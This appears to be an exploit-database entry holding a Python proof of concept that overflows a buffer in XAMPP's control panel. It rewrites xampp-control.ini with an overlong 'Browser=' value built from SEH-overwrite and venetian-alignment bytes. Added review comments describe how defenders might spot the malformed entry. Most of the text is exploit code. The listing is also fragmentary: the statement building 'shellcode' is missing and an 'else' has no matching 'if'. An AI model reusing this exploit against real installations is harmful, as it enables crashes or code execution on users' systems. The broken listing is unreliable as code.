Exploits / Vulnerability Discovered : 2024-02-19 |
Type : dos |
Platform : windows
This XAMPP buffer overflow proof of concept is for educational purposes only; if you use it, you do so at your own risk!
# 1.- Run the python script "poc.py", it will create a new file "xampp-control.ini"
# 2.- Open the application (xampp-control.exe)
# 3.- Click on the "admin" button in front of Apache service.
# 4.- Profit
# Proof-of-Concept code on GitHub: https://github.com/ripp3rdoc/XAMPPv3.3.0-BOF/
# Greetingz to EMU TEAM (¬‿¬)⩙
from pwn import *
import shutil
import os.path
# Fragments of the overlong string this PoC places in xampp-control.ini.
# The statement that joins them into `shellcode` (the name interpolated after
# "Browser=" where the file is written) is not visible in this listing;
# presumably it concatenates the names below — confirm against the upstream PoC.
#
# Defender's view: per the numbered steps in the header, the trigger is local.
# The config file is rewritten and a user then clicks "admin" in
# xampp-control.exe, so a "Browser=" entry far longer than a plausible
# executable path is the artifact to look for in that file.
#
# NOTE(review): the hard-coded handler address (0x00430015) and the stack
# values quoted in the comments look specific to one build of the binary —
# confirm the affected version before relying on them for triage.
buffer = "\x41" * 268 # 268 bytes to fill the buffer
nseh = "\x59\x71" # next SEH address — 0x00590071 (a harmless padding)
seh = "\x15\x43" # SEH handler — 0x00430015: pop ecx ; pop ebp ; ret ;
padd = "\x71" * 0x55 # padding (0x55 = 85 characters)
# eax_align is built one fragment at a time; per the author's comments, the
# "\x71" entries are alignment filler between the meaningful bytes.
eax_align = "\x47" # venetian pad/align
eax_align += "\x51" # push ecx
eax_align += "\x71" # venetian pad/align
eax_align += "\x58" # pop eax -> eax = 0019e1a0
eax_align += "\x71" # venetian pad/align
eax_align += "\x05\x24\x11" # add eax,0x11002300
eax_align += "\x71" # venetian pad/align
eax_align += "\x2d\x11\x11" # sub eax,0x11001100 -> eax = 0019F3DC
eax_align += "\x71" # venetian pad/align
eax_align += "\x50" # push eax
eax_align += "\x71" # pad to align the following ret
eax_align += "\xc3"; # ret into eax?
print("[!] Backup file found. Generating the POC file...")
pass
else:
# create backup
try:
shutil.copyfile("c:\\xampp\\xampp-control.ini", "c:\\xampp\\xampp-control.ini.bak")
print("[+] Creating backup for xampp-control.ini...")
print("[+] Backup file created!")
except Exception as e:
print("[!] Failed creating a backup for xampp-control.ini: ", e)
try:
# Create the new file
with open("c:\\xampp\\xampp-control.ini", "w", encoding='utf-8') as file:
file.write(f"""[Common]
Edition=
Editor=
Browser={shellcode}